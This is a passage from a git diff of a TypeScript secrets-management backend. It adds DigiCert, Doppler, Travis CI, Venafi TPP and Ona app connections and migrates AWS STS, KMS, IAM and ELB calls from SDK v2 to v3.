VenafiTppConnectionMethod.OAuth: return "OAuth"; case HerokuConnectionMethod.AuthToken: return "Auth Token"; @@ -490,6 +526,7 @@ export const getAppConnectionMethodName = (method: TAppConnection["method"]) => case LaravelForgeConnectionMethod.ApiToken: case DbtConnectionMethod.ApiToken: case CircleCIConnectionMethod.ApiToken: + case TravisCIConnectionMethod.ApiToken: return "API Token"; case DNSMadeEasyConnectionMethod.APIKeySecret: return "API Key & Secret"; @@ -523,12 +560,12 @@ export const getAppConnectionMethodName = (method: TAppConnection["method"]) => case SmbConnectionMethod.Credentials: return "Credentials"; case VenafiConnectionMethod.ApiKey: - return "API Key"; case RenderConnectionMethod.ApiKey: case ChecklyConnectionMethod.ApiKey: case OctopusDeployConnectionMethod.ApiKey: case OpenRouterConnectionMethod.ApiKey: case AnthropicConnectionMethod.ApiKey: + case DigiCertConnectionMethod.ApiKey: return "API Key"; case ChefConnectionMethod.UserKey: return "User Key"; @@ -538,6 +575,8 @@ export const getAppConnectionMethodName = (method: TAppConnection["method"]) => return "Basic Auth"; case ExternalInfisicalConnectionMethod.MachineIdentityUniversalAuth: return "Machine Identity - Universal Auth"; + case DopplerConnectionMethod.ApiToken: + return "API Token"; default: // eslint-disable-next-line @typescript-eslint/restrict-template-expressions throw new Error(`Unhandled App Connection Method: ${method}`); @@ -646,8 +685,13 @@ export const TRANSITION_CONNECTION_CREDENTIALS_TO_PLATFORM: Record< [AppConnection.CircleCI]: platformManagedCredentialsNotSupported, [AppConnection.AzureEntraId]: platformManagedCredentialsNotSupported, [AppConnection.Venafi]: platformManagedCredentialsNotSupported, + [AppConnection.VenafiTpp]: platformManagedCredentialsNotSupported, [AppConnection.ExternalInfisical]: platformManagedCredentialsNotSupported, - [AppConnection.NetScaler]: platformManagedCredentialsNotSupported + [AppConnection.NetScaler]: 
platformManagedCredentialsNotSupported, + [AppConnection.Doppler]: platformManagedCredentialsNotSupported, + [AppConnection.Ona]: platformManagedCredentialsNotSupported, + [AppConnection.DigiCert]: platformManagedCredentialsNotSupported, + [AppConnection.TravisCI]: platformManagedCredentialsNotSupported }; export const enterpriseAppCheck = async ( diff --git a/backend/src/services/app-connection/app-connection-maps.ts b/backend/src/services/app-connection/app-connection-maps.ts index b3de1153d2b..645ad41cb1e 100644 --- a/backend/src/services/app-connection/app-connection-maps.ts +++ b/backend/src/services/app-connection/app-connection-maps.ts @@ -54,9 +54,14 @@ export const APP_CONNECTION_NAME_MAP: Record = { [AppConnection.CircleCI]: "CircleCI", [AppConnection.AzureEntraId]: "Azure Entra ID", [AppConnection.Venafi]: "Venafi TLS Protect Cloud", + [AppConnection.VenafiTpp]: "Venafi TPP", [AppConnection.ExternalInfisical]: "Infisical", + [AppConnection.Doppler]: "Doppler", [AppConnection.NetScaler]: "NetScaler", - [AppConnection.Anthropic]: "Anthropic" + [AppConnection.Anthropic]: "Anthropic", + [AppConnection.Ona]: "Ona", + [AppConnection.DigiCert]: "DigiCert", + [AppConnection.TravisCI]: "Travis CI" }; export const APP_CONNECTION_PLAN_MAP: Record = { @@ -113,7 +118,12 @@ export const APP_CONNECTION_PLAN_MAP: Record>>; @@ -451,9 +486,14 @@ export type TAppConnectionInput = { id: string } & ( | TCircleCIConnectionInput | TAzureEntraIdConnectionInput | TVenafiConnectionInput + | TVenafiTppConnectionInput | TExternalInfisicalConnectionInput + | TDopplerConnectionInput | TNetScalerConnectionInput | TAnthropicConnectionInput + | TOnaConnectionInput + | TDigiCertConnectionInput + | TTravisCIConnectionInput ); export type TSqlConnectionInput = @@ -547,9 +587,14 @@ export type TAppConnectionConfig = | TCircleCIConnectionConfig | TAzureEntraIdConnectionConfig | TVenafiConnectionConfig + | TVenafiTppConnectionConfig | TExternalInfisicalConnectionConfig + | 
TDopplerConnectionConfig | TNetScalerConnectionConfig - | TAnthropicConnectionConfig; + | TAnthropicConnectionConfig + | TOnaConnectionConfig + | TDigiCertConnectionConfig + | TTravisCIConnectionConfig; export type TValidateAppConnectionCredentialsSchema = | TValidateAwsConnectionCredentialsSchema @@ -605,9 +650,14 @@ export type TValidateAppConnectionCredentialsSchema = | TValidateCircleCIConnectionCredentialsSchema | TValidateAzureEntraIdConnectionCredentialsSchema | TValidateVenafiConnectionCredentialsSchema + | TValidateVenafiTppConnectionCredentialsSchema | TValidateExternalInfisicalConnectionCredentialsSchema + | TValidateDopplerConnectionCredentialsSchema | TValidateNetScalerConnectionCredentialsSchema - | TValidateAnthropicConnectionCredentialsSchema; + | TValidateAnthropicConnectionCredentialsSchema + | TValidateOnaConnectionCredentialsSchema + | TValidateDigiCertConnectionCredentialsSchema + | TValidateTravisCIConnectionCredentialsSchema; export type TListAwsConnectionKmsKeys = { connectionId: string; diff --git a/backend/src/services/app-connection/aws/aws-connection-fns.ts b/backend/src/services/app-connection/aws/aws-connection-fns.ts index bc22b60a702..50654bc78ae 100644 --- a/backend/src/services/app-connection/aws/aws-connection-fns.ts +++ b/backend/src/services/app-connection/aws/aws-connection-fns.ts @@ -1,6 +1,4 @@ -import { AssumeRoleCommand, STSClient } from "@aws-sdk/client-sts"; -import type { AWSError, Response } from "aws-sdk"; -import STS from "aws-sdk/clients/sts.js"; +import { AssumeRoleCommand, GetCallerIdentityCommand, STSClient, STSServiceException } from "@aws-sdk/client-sts"; import { AxiosError } from "axios"; import { CustomAWSHasher } from "@app/lib/aws/hashing"; @@ -87,18 +85,28 @@ export const getAwsConnectionConfig = async (appConnection: TAwsConnectionConfig }; export const validateAwsConnectionCredentials = async (appConnection: TAwsConnectionConfig) => { - let resp: STS.GetCallerIdentityResponse & { - $response: Response; - 
}; - try { const awsConfig = await getAwsConnectionConfig(appConnection); - const sts = new STS(awsConfig); + const sts = new STSClient({ + region: awsConfig.region, + credentials: awsConfig.credentials + }); - resp = await sts.getCallerIdentity().promise(); + await sts.send(new GetCallerIdentityCommand({})); } catch (error: unknown) { logger.error(error, "Error validating AWS connection credentials"); + // v3 SDK throws on non-2xx responses (v2 resolved and required manual status check). + // Preserve the original InternalServerError for AWS-level failures. + if (error instanceof STSServiceException) { + throw new InternalServerError({ + message: `Unable to validate credentials: ${ + error.message ?? + `AWS responded with a status code of ${error.$metadata.httpStatusCode}. Verify credentials and try again.` + }` + }); + } + let message: string; if (error instanceof AxiosError) { @@ -113,13 +121,5 @@ export const validateAwsConnectionCredentials = async (appConnection: TAwsConnec }); } - if (resp?.$response.httpResponse.statusCode !== 200) - throw new InternalServerError({ - message: `Unable to validate credentials: ${ - resp.$response.error?.message ?? - `AWS responded with a status code of ${resp.$response.httpResponse.statusCode}. 
Verify credentials and try again.` - }` - }); - return appConnection.credentials; }; diff --git a/backend/src/services/app-connection/aws/aws-connection-service.ts b/backend/src/services/app-connection/aws/aws-connection-service.ts index 0046b18c7eb..4d4ef10ff51 100644 --- a/backend/src/services/app-connection/aws/aws-connection-service.ts +++ b/backend/src/services/app-connection/aws/aws-connection-service.ts @@ -1,6 +1,16 @@ -import ELBv2 from "aws-sdk/clients/elbv2.js"; -import IAM from "aws-sdk/clients/iam.js"; -import KMS from "aws-sdk/clients/kms.js"; +import { + DescribeListenersCommand, + DescribeLoadBalancersCommand, + ElasticLoadBalancingV2Client +} from "@aws-sdk/client-elastic-load-balancing-v2"; +import { IAMClient, ListUsersCommand, type User } from "@aws-sdk/client-iam"; +import { + type AliasListEntry, + DescribeKeyCommand, + type KeyMetadata, + KMSClient, + ListAliasesCommand +} from "@aws-sdk/client-kms"; import { OrgServiceActor } from "@app/lib/types"; import { AppConnection, AWSRegion } from "@app/services/app-connection/app-connection-enums"; @@ -27,24 +37,24 @@ const listAwsKmsKeys = async ( ) => { const { credentials } = await getAwsConnectionConfig(appConnection, region); - const awsKms = new KMS({ + const awsKms = new KMSClient({ credentials, region }); - const aliasEntries: KMS.AliasList = []; + const aliasEntries: AliasListEntry[] = []; let aliasMarker: string | undefined; do { // eslint-disable-next-line no-await-in-loop - const response = await awsKms.listAliases({ Limit: 100, Marker: aliasMarker }).promise(); + const response = await awsKms.send(new ListAliasesCommand({ Limit: 100, Marker: aliasMarker })); aliasEntries.push(...(response.Aliases || [])); aliasMarker = response.NextMarker; } while (aliasMarker); - const keyMetadataRecord: Record = {}; + const keyMetadataRecord: Record = {}; for await (const aliasEntry of aliasEntries) { if (aliasEntry.TargetKeyId) { - const keyDescription = await awsKms.describeKey({ KeyId: 
aliasEntry.TargetKeyId }).promise(); + const keyDescription = await awsKms.send(new DescribeKeyCommand({ KeyId: aliasEntry.TargetKeyId })); keyMetadataRecord[aliasEntry.TargetKeyId] = keyDescription.KeyMetadata; } @@ -79,15 +89,15 @@ const listAwsKmsKeys = async ( }; const listAwsIamUsers = async (appConnection: TAwsConnection) => { - const { credentials } = await getAwsConnectionConfig(appConnection); + const { region, credentials } = await getAwsConnectionConfig(appConnection); - const iam = new IAM({ credentials }); + const iam = new IAMClient({ credentials, region }); - const userEntries: IAM.User[] = []; + const userEntries: User[] = []; let userMarker: string | undefined; do { // eslint-disable-next-line no-await-in-loop - const response = await iam.listUsers({ MaxItems: 100, Marker: userMarker }).promise(); + const response = await iam.send(new ListUsersCommand({ MaxItems: 100, Marker: userMarker })); userEntries.push(...(response.Users || [])); userMarker = response.Marker; } while (userMarker); @@ -123,7 +133,7 @@ const listAwsLoadBalancers = async ( ): Promise => { const { credentials } = await getAwsConnectionConfig(appConnection, region); - const elbClient = new ELBv2({ + const elbClient = new ElasticLoadBalancingV2Client({ credentials, region }); @@ -133,11 +143,11 @@ const listAwsLoadBalancers = async ( do { // eslint-disable-next-line no-await-in-loop - const response = await elbClient - .describeLoadBalancers({ + const response = await elbClient.send( + new DescribeLoadBalancersCommand({ Marker: marker }) - .promise(); + ); if (response.LoadBalancers) { for (const lb of response.LoadBalancers) { @@ -169,7 +179,7 @@ const listAwsListeners = async ( ): Promise => { const { credentials } = await getAwsConnectionConfig(appConnection, region); - const elbClient = new ELBv2({ + const elbClient = new ElasticLoadBalancingV2Client({ credentials, region }); @@ -179,12 +189,12 @@ const listAwsListeners = async ( do { // eslint-disable-next-line 
no-await-in-loop - const response = await elbClient - .describeListeners({ + const response = await elbClient.send( + new DescribeListenersCommand({ LoadBalancerArn: loadBalancerArn, Marker: marker }) - .promise(); + ); if (response.Listeners) { for (const listener of response.Listeners) { diff --git a/backend/src/services/app-connection/bitbucket/bitbucket-connection-fns.ts b/backend/src/services/app-connection/bitbucket/bitbucket-connection-fns.ts index 646dc595a87..a3169a0b3f0 100644 --- a/backend/src/services/app-connection/bitbucket/bitbucket-connection-fns.ts +++ b/backend/src/services/app-connection/bitbucket/bitbucket-connection-fns.ts @@ -53,8 +53,12 @@ export const validateBitbucketConnectionCredentials = async (config: TBitbucketC return config.credentials; }; +interface BitbucketWorkspaceMembership { + workspace: { slug: string }; +} + interface BitbucketWorkspacesResponse { - values: TBitbucketWorkspace[]; + values: BitbucketWorkspaceMembership[]; next?: string; } @@ -67,7 +71,7 @@ export const listBitbucketWorkspaces = async (appConnection: TBitbucketConnectio }; let allWorkspaces: TBitbucketWorkspace[] = []; - let nextUrl: string | undefined = `${IntegrationUrls.BITBUCKET_API_URL}/2.0/workspaces?pagelen=100`; + let nextUrl: string | undefined = `${IntegrationUrls.BITBUCKET_API_URL}/2.0/user/workspaces?pagelen=100`; let iterationCount = 0; // Limit to 10 iterations, fetching at most 10 * 100 = 1000 workspaces @@ -77,7 +81,7 @@ export const listBitbucketWorkspaces = async (appConnection: TBitbucketConnectio headers }); - allWorkspaces = allWorkspaces.concat(data.values.map((workspace) => ({ slug: workspace.slug }))); + allWorkspaces = allWorkspaces.concat(data.values.map((membership) => ({ slug: membership.workspace.slug }))); nextUrl = data.next; iterationCount += 1; } diff --git a/backend/src/services/app-connection/dbt/dbt-connection-fns.ts b/backend/src/services/app-connection/dbt/dbt-connection-fns.ts index 4ce9d3cbb04..d059ece14e6 100644 --- 
a/backend/src/services/app-connection/dbt/dbt-connection-fns.ts +++ b/backend/src/services/app-connection/dbt/dbt-connection-fns.ts @@ -1,6 +1,7 @@ /* eslint-disable no-await-in-loop */ -import axios, { AxiosError } from "axios"; +import { AxiosError } from "axios"; +import { request } from "@app/lib/config/request"; import { BadRequestError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; @@ -53,7 +54,7 @@ export const retrieveDbtAccount = async (config: TDbtConnectionConfig) => { const dbtUrl = await getDbtUrl(config); - await axios.get(`${dbtUrl}/api/v2/accounts/${credentials.accountId}/`, { + await request.get(`${dbtUrl}/api/v2/accounts/${credentials.accountId}/`, { headers: { Authorization: `Bearer ${credentials.apiToken}` } @@ -90,7 +91,7 @@ export const listDbtProjects = async (config: TDbtConnectionConfig) => { const dbtUrl = await getDbtUrl(config); - const res = await axios.get( + const res = await request.get( `${dbtUrl}/api/v3/accounts/${credentials.accountId}/projects`, { headers: { diff --git a/backend/src/services/app-connection/digicert/digicert-connection-constants.ts b/backend/src/services/app-connection/digicert/digicert-connection-constants.ts new file mode 100644 index 00000000000..fec1fec4af0 --- /dev/null +++ b/backend/src/services/app-connection/digicert/digicert-connection-constants.ts @@ -0,0 +1 @@ +export const DIGICERT_AUTH_HEADER = "X-DC-DEVKEY"; diff --git a/backend/src/services/app-connection/digicert/digicert-connection-enums.ts b/backend/src/services/app-connection/digicert/digicert-connection-enums.ts new file mode 100644 index 00000000000..0e4f0a46a16 --- /dev/null +++ b/backend/src/services/app-connection/digicert/digicert-connection-enums.ts @@ -0,0 +1,8 @@ +export enum DigiCertConnectionMethod { + ApiKey = "api-key" +} + +export enum DigiCertRegion { + US = "us", + EU = "eu" +} diff --git 
a/backend/src/services/app-connection/digicert/digicert-connection-errors.ts b/backend/src/services/app-connection/digicert/digicert-connection-errors.ts new file mode 100644 index 00000000000..636324ec2cd --- /dev/null +++ b/backend/src/services/app-connection/digicert/digicert-connection-errors.ts @@ -0,0 +1,15 @@ +import { AxiosError } from "axios"; + +type TDigiCertErrorResponse = { errors?: { code?: string; message?: string }[] }; + +export const extractDigiCertErrorMessage = (error: unknown) => { + if (error instanceof AxiosError) { + const data = error.response?.data as TDigiCertErrorResponse | undefined; + const firstError = data?.errors?.[0]; + if (firstError?.message) { + return firstError.code ? `${firstError.message} (${firstError.code})` : firstError.message; + } + return error.message || "Unknown error"; + } + return (error as Error).message || "Unknown error"; +}; diff --git a/backend/src/services/app-connection/digicert/digicert-connection-fns.ts b/backend/src/services/app-connection/digicert/digicert-connection-fns.ts new file mode 100644 index 00000000000..f136db2efa9 --- /dev/null +++ b/backend/src/services/app-connection/digicert/digicert-connection-fns.ts @@ -0,0 +1,140 @@ +import { AxiosError } from "axios"; + +import { request } from "@app/lib/config/request"; +import { BadRequestError } from "@app/lib/errors"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { IntegrationUrls } from "@app/services/integration-auth/integration-list"; + +import { DIGICERT_AUTH_HEADER } from "./digicert-connection-constants"; +import { DigiCertConnectionMethod, DigiCertRegion } from "./digicert-connection-enums"; +import { extractDigiCertErrorMessage } from "./digicert-connection-errors"; +import { + TDigiCertConnection, + TDigiCertConnectionConfig, + TDigiCertOrganization, + TDigiCertProduct +} from "./digicert-connection-types"; + +export const getDigiCertConnectionListItem = () => { + return { + name: "DigiCert" as 
const, + app: AppConnection.DigiCert as const, + methods: Object.values(DigiCertConnectionMethod) as [DigiCertConnectionMethod.ApiKey] + }; +}; + +export const getDigiCertApiBaseUrl = (region: DigiCertRegion): string => { + switch (region) { + case DigiCertRegion.EU: + return IntegrationUrls.DIGICERT_SERVICES_API_URL_EU; + case DigiCertRegion.US: + default: + return IntegrationUrls.DIGICERT_SERVICES_API_URL; + } +}; + +export const validateDigiCertConnectionCredentials = async (config: TDigiCertConnectionConfig) => { + const { credentials: inputCredentials } = config; + const baseUrl = getDigiCertApiBaseUrl(inputCredentials.region); + + try { + await request.get(`${baseUrl}/organization`, { + headers: { + [DIGICERT_AUTH_HEADER]: inputCredentials.apiKey, + "Content-Type": "application/json" + } + }); + } catch (error: unknown) { + if (error instanceof AxiosError) { + throw new BadRequestError({ + message: `Failed to validate credentials: ${extractDigiCertErrorMessage(error)}` + }); + } + throw new BadRequestError({ + message: `Unable to validate connection: ${(error as Error).message || "Verify credentials"}` + }); + } + + return inputCredentials; +}; + +type TDigiCertOrganizationsResponse = { + organizations: { + id: number; + name: string; + display_name?: string; + status?: string; + }[]; +}; + +export const listDigiCertOrganizations = async ( + appConnection: TDigiCertConnection +): Promise => { + const { apiKey, region } = appConnection.credentials; + const baseUrl = getDigiCertApiBaseUrl(region); + + try { + const { data } = await request.get(`${baseUrl}/organization`, { + headers: { + [DIGICERT_AUTH_HEADER]: apiKey, + "Content-Type": "application/json" + } + }); + + return (data.organizations ?? 
[]).map((org) => ({ + id: org.id, + name: org.name, + displayName: org.display_name, + status: org.status + })); + } catch (error: unknown) { + if (error instanceof AxiosError) { + throw new BadRequestError({ + message: `Failed to list DigiCert organizations: ${extractDigiCertErrorMessage(error)}` + }); + } + throw error; + } +}; + +type TDigiCertProductsResponse = { + products: { + name_id: string; + name: string; + type?: string; + validation_type?: string; + signature_hash_types?: { allowed_hash_types?: { id?: string }[] }; + }[]; +}; + +const DIGICERT_SSL_PRODUCT_TYPE = "ssl_certificate"; + +export const listDigiCertProducts = async (appConnection: TDigiCertConnection): Promise => { + const { apiKey, region } = appConnection.credentials; + const baseUrl = getDigiCertApiBaseUrl(region); + + try { + const { data } = await request.get(`${baseUrl}/product`, { + headers: { + [DIGICERT_AUTH_HEADER]: apiKey, + "Content-Type": "application/json" + } + }); + + return (data.products ?? []) + .filter((product) => product.type === DIGICERT_SSL_PRODUCT_TYPE) + .map((product) => ({ + nameId: product.name_id, + name: product.name, + type: product.type, + validationType: product.validation_type + })); + } catch (error: unknown) { + if (error instanceof AxiosError) { + throw new BadRequestError({ + message: `Failed to list DigiCert products: ${extractDigiCertErrorMessage(error)}` + }); + } + throw error; + } +}; diff --git a/backend/src/services/app-connection/digicert/digicert-connection-schemas.ts b/backend/src/services/app-connection/digicert/digicert-connection-schemas.ts new file mode 100644 index 00000000000..409c4d70174 --- /dev/null +++ b/backend/src/services/app-connection/digicert/digicert-connection-schemas.ts @@ -0,0 +1,62 @@ +import z from "zod"; + +import { AppConnections } from "@app/lib/api-docs"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { + BaseAppConnectionSchema, + GenericCreateAppConnectionFieldsSchema, + 
GenericUpdateAppConnectionFieldsSchema +} from "@app/services/app-connection/app-connection-schemas"; + +import { APP_CONNECTION_NAME_MAP } from "../app-connection-maps"; +import { DigiCertConnectionMethod, DigiCertRegion } from "./digicert-connection-enums"; + +export const DigiCertConnectionApiKeyCredentialsSchema = z.object({ + apiKey: z.string().trim().min(1, "API Key required").describe(AppConnections.CREDENTIALS.DIGICERT.apiKey), + region: z.nativeEnum(DigiCertRegion).describe(AppConnections.CREDENTIALS.DIGICERT.region) +}); + +const BaseDigiCertConnectionSchema = BaseAppConnectionSchema.extend({ + app: z.literal(AppConnection.DigiCert) +}); + +export const DigiCertConnectionSchema = BaseDigiCertConnectionSchema.extend({ + method: z.literal(DigiCertConnectionMethod.ApiKey), + credentials: DigiCertConnectionApiKeyCredentialsSchema +}); + +export const SanitizedDigiCertConnectionSchema = z.discriminatedUnion("method", [ + BaseDigiCertConnectionSchema.extend({ + method: z.literal(DigiCertConnectionMethod.ApiKey), + credentials: DigiCertConnectionApiKeyCredentialsSchema.pick({ region: true }) + }).describe(JSON.stringify({ title: `${APP_CONNECTION_NAME_MAP[AppConnection.DigiCert]} (API Key)` })) +]); + +export const ValidateDigiCertConnectionCredentialsSchema = z.discriminatedUnion("method", [ + z.object({ + method: z.literal(DigiCertConnectionMethod.ApiKey).describe(AppConnections.CREATE(AppConnection.DigiCert).method), + credentials: DigiCertConnectionApiKeyCredentialsSchema.describe( + AppConnections.CREATE(AppConnection.DigiCert).credentials + ) + }) +]); + +export const CreateDigiCertConnectionSchema = ValidateDigiCertConnectionCredentialsSchema.and( + GenericCreateAppConnectionFieldsSchema(AppConnection.DigiCert) +); + +export const UpdateDigiCertConnectionSchema = z + .object({ + credentials: DigiCertConnectionApiKeyCredentialsSchema.optional().describe( + AppConnections.UPDATE(AppConnection.DigiCert).credentials + ) + }) + 
.and(GenericUpdateAppConnectionFieldsSchema(AppConnection.DigiCert)); + +export const DigiCertConnectionListItemSchema = z + .object({ + name: z.literal("DigiCert"), + app: z.literal(AppConnection.DigiCert), + methods: z.nativeEnum(DigiCertConnectionMethod).array() + }) + .describe(JSON.stringify({ title: APP_CONNECTION_NAME_MAP[AppConnection.DigiCert] })); diff --git a/backend/src/services/app-connection/digicert/digicert-connection-service.ts b/backend/src/services/app-connection/digicert/digicert-connection-service.ts new file mode 100644 index 00000000000..adc7fcc03fb --- /dev/null +++ b/backend/src/services/app-connection/digicert/digicert-connection-service.ts @@ -0,0 +1,39 @@ +import { logger } from "@app/lib/logger"; +import { OrgServiceActor } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { listDigiCertOrganizations, listDigiCertProducts } from "./digicert-connection-fns"; +import { TDigiCertConnection } from "./digicert-connection-types"; + +type TGetAppConnectionFunc = ( + app: AppConnection, + connectionId: string, + actor: OrgServiceActor +) => Promise; + +export const digicertConnectionService = (getAppConnection: TGetAppConnectionFunc) => { + const listOrganizations = async (connectionId: string, actor: OrgServiceActor) => { + const appConnection = await getAppConnection(AppConnection.DigiCert, connectionId, actor); + try { + return await listDigiCertOrganizations(appConnection); + } catch (error) { + logger.error(error, `Failed to list DigiCert organizations [connectionId=${connectionId}]`); + return []; + } + }; + + const listProducts = async (connectionId: string, actor: OrgServiceActor) => { + const appConnection = await getAppConnection(AppConnection.DigiCert, connectionId, actor); + try { + return await listDigiCertProducts(appConnection); + } catch (error) { + logger.error(error, `Failed to list DigiCert products [connectionId=${connectionId}]`); + return []; + } + }; + + return { + 
listOrganizations, + listProducts + }; +}; diff --git a/backend/src/services/app-connection/digicert/digicert-connection-types.ts b/backend/src/services/app-connection/digicert/digicert-connection-types.ts new file mode 100644 index 00000000000..3d424e34202 --- /dev/null +++ b/backend/src/services/app-connection/digicert/digicert-connection-types.ts @@ -0,0 +1,39 @@ +import z from "zod"; + +import { DiscriminativePick } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { + CreateDigiCertConnectionSchema, + DigiCertConnectionSchema, + ValidateDigiCertConnectionCredentialsSchema +} from "./digicert-connection-schemas"; + +export type TDigiCertConnection = z.infer; + +export type TDigiCertConnectionInput = z.infer & { + app: AppConnection.DigiCert; +}; + +export type TValidateDigiCertConnectionCredentialsSchema = typeof ValidateDigiCertConnectionCredentialsSchema; + +export type TDigiCertConnectionConfig = DiscriminativePick< + TDigiCertConnectionInput, + "method" | "app" | "credentials" +> & { + orgId: string; +}; + +export type TDigiCertOrganization = { + id: number; + name: string; + displayName?: string; + status?: string; +}; + +export type TDigiCertProduct = { + nameId: string; + name: string; + type?: string; + validationType?: string; +}; diff --git a/backend/src/services/app-connection/digicert/index.ts b/backend/src/services/app-connection/digicert/index.ts new file mode 100644 index 00000000000..de9105d54e6 --- /dev/null +++ b/backend/src/services/app-connection/digicert/index.ts @@ -0,0 +1,5 @@ +export * from "./digicert-connection-enums"; +export * from "./digicert-connection-errors"; +export * from "./digicert-connection-fns"; +export * from "./digicert-connection-schemas"; +export * from "./digicert-connection-types"; diff --git a/backend/src/services/app-connection/doppler/doppler-connection-enums.ts b/backend/src/services/app-connection/doppler/doppler-connection-enums.ts new file mode 100644 index 
00000000000..2bc9e4f9db6 --- /dev/null +++ b/backend/src/services/app-connection/doppler/doppler-connection-enums.ts @@ -0,0 +1,3 @@ +export enum DopplerConnectionMethod { + ApiToken = "api-token" +} diff --git a/backend/src/services/app-connection/doppler/doppler-connection-fns.ts b/backend/src/services/app-connection/doppler/doppler-connection-fns.ts new file mode 100644 index 00000000000..4316f0b4d70 --- /dev/null +++ b/backend/src/services/app-connection/doppler/doppler-connection-fns.ts @@ -0,0 +1,174 @@ +import { AxiosError } from "axios"; + +import { request } from "@app/lib/config/request"; +import { BadRequestError } from "@app/lib/errors"; + +import { AppConnection } from "../app-connection-enums"; +import { DopplerConnectionMethod } from "./doppler-connection-enums"; +import { + TDopplerConfig, + TDopplerConnection, + TDopplerConnectionConfig, + TDopplerEnvironment, + TDopplerProject, + TDopplerSecret +} from "./doppler-connection-types"; + +const DOPPLER_API_URL = "https://api.doppler.com"; + +export const getDopplerConnectionListItem = () => { + return { + name: "Doppler" as const, + app: AppConnection.Doppler as const, + methods: Object.values(DopplerConnectionMethod) as [DopplerConnectionMethod.ApiToken] + }; +}; + +export const validateDopplerConnectionCredentials = async (config: TDopplerConnectionConfig) => { + const { credentials: inputCredentials } = config; + + try { + await request.get(`${DOPPLER_API_URL}/v3/me`, { + headers: { + Authorization: `Bearer ${inputCredentials.apiToken}` + } + }); + } catch (error: unknown) { + if (error instanceof AxiosError) { + const responseData = error.response?.data as { messages?: string[] } | undefined; + throw new BadRequestError({ + message: `Failed to validate Doppler credentials: ${responseData?.messages?.join(", ") || error.message || "Unknown error"}` + }); + } + throw new BadRequestError({ + message: "Unable to validate Doppler connection: verify credentials" + }); + } + + return inputCredentials; +}; 
+ +export const listDopplerProjects = async (appConnection: TDopplerConnection): Promise => { + const { + credentials: { apiToken } + } = appConnection; + + const projects: TDopplerProject[] = []; + let page = 1; + const perPage = 50; + const maxPages = 20; + let hasMore = true; + + while (hasMore && page <= maxPages) { + // eslint-disable-next-line no-await-in-loop + const res = await request.get<{ projects: TDopplerProject[]; page: number }>(`${DOPPLER_API_URL}/v3/projects`, { + params: { page, per_page: perPage }, + headers: { Authorization: `Bearer ${apiToken}` } + }); + + projects.push(...res.data.projects); + + if (res.data.projects.length < perPage) { + hasMore = false; + } else { + page += 1; + } + } + + return projects; +}; + +export const listDopplerEnvironments = async ( + appConnection: TDopplerConnection, + projectSlug: string +): Promise => { + const { + credentials: { apiToken } + } = appConnection; + + const environments: TDopplerEnvironment[] = []; + let page = 1; + const perPage = 50; + const maxPages = 20; + let hasMore = true; + + while (hasMore && page <= maxPages) { + // eslint-disable-next-line no-await-in-loop + const res = await request.get<{ environments: TDopplerEnvironment[] }>(`${DOPPLER_API_URL}/v3/environments`, { + params: { project: projectSlug, page, per_page: perPage }, + headers: { Authorization: `Bearer ${apiToken}` } + }); + + environments.push(...res.data.environments); + + if (res.data.environments.length < perPage) { + hasMore = false; + } else { + page += 1; + } + } + + return environments; +}; + +export const listDopplerConfigs = async ( + appConnection: TDopplerConnection, + projectSlug: string +): Promise => { + const { + credentials: { apiToken } + } = appConnection; + + const configs: TDopplerConfig[] = []; + let page = 1; + const perPage = 50; + const maxPages = 20; + let hasMore = true; + + while (hasMore && page <= maxPages) { + // eslint-disable-next-line no-await-in-loop + const res = await request.get<{ configs: 
TDopplerConfig[] }>(`${DOPPLER_API_URL}/v3/configs`, { + params: { project: projectSlug, page, per_page: perPage }, + headers: { Authorization: `Bearer ${apiToken}` } + }); + + configs.push(...res.data.configs); + + if (res.data.configs.length < perPage) { + hasMore = false; + } else { + page += 1; + } + } + + return configs; +}; + +export const getDopplerSecrets = async ( + appConnection: TDopplerConnection, + projectSlug: string, + environmentSlug: string +): Promise> => { + const { + credentials: { apiToken } + } = appConnection; + + const res = await request.get<{ secrets: Record }>( + `${DOPPLER_API_URL}/v3/configs/config/secrets`, + { + params: { + project: projectSlug, + config: environmentSlug, + include_dynamic_secrets: false, + include_managed_secrets: false + }, + headers: { Authorization: `Bearer ${apiToken}` } + } + ); + + return Object.fromEntries( + Object.entries(res.data.secrets) + .filter(([, v]) => v.raw !== null) + .map(([k, v]) => [k, v.raw as string]) + ); +}; diff --git a/backend/src/services/app-connection/doppler/doppler-connection-schema.ts b/backend/src/services/app-connection/doppler/doppler-connection-schema.ts new file mode 100644 index 00000000000..d0a0a1ebca1 --- /dev/null +++ b/backend/src/services/app-connection/doppler/doppler-connection-schema.ts @@ -0,0 +1,59 @@ +import z from "zod"; + +import { AppConnections } from "@app/lib/api-docs"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { + BaseAppConnectionSchema, + GenericCreateAppConnectionFieldsSchema, + GenericUpdateAppConnectionFieldsSchema +} from "@app/services/app-connection/app-connection-schemas"; + +import { APP_CONNECTION_NAME_MAP } from "../app-connection-maps"; +import { DopplerConnectionMethod } from "./doppler-connection-enums"; + +export const DopplerConnectionApiTokenCredentialsSchema = z.object({ + apiToken: z.string().trim().min(1, "API token required").max(512, "API token cannot exceed 512 characters") +}); + +const 
BaseDopplerConnectionSchema = BaseAppConnectionSchema.extend({ app: z.literal(AppConnection.Doppler) }); + +export const DopplerConnectionSchema = BaseDopplerConnectionSchema.extend({ + method: z.literal(DopplerConnectionMethod.ApiToken), + credentials: DopplerConnectionApiTokenCredentialsSchema +}); + +export const SanitizedDopplerConnectionSchema = z.discriminatedUnion("method", [ + BaseDopplerConnectionSchema.extend({ + method: z.literal(DopplerConnectionMethod.ApiToken), + credentials: DopplerConnectionApiTokenCredentialsSchema.pick({}) + }).describe(JSON.stringify({ title: `${APP_CONNECTION_NAME_MAP[AppConnection.Doppler]} (API Token)` })) +]); + +export const ValidateDopplerConnectionCredentialsSchema = z.discriminatedUnion("method", [ + z.object({ + method: z.literal(DopplerConnectionMethod.ApiToken).describe(AppConnections.CREATE(AppConnection.Doppler).method), + credentials: DopplerConnectionApiTokenCredentialsSchema.describe( + AppConnections.CREATE(AppConnection.Doppler).credentials + ) + }) +]); + +export const CreateDopplerConnectionSchema = ValidateDopplerConnectionCredentialsSchema.and( + 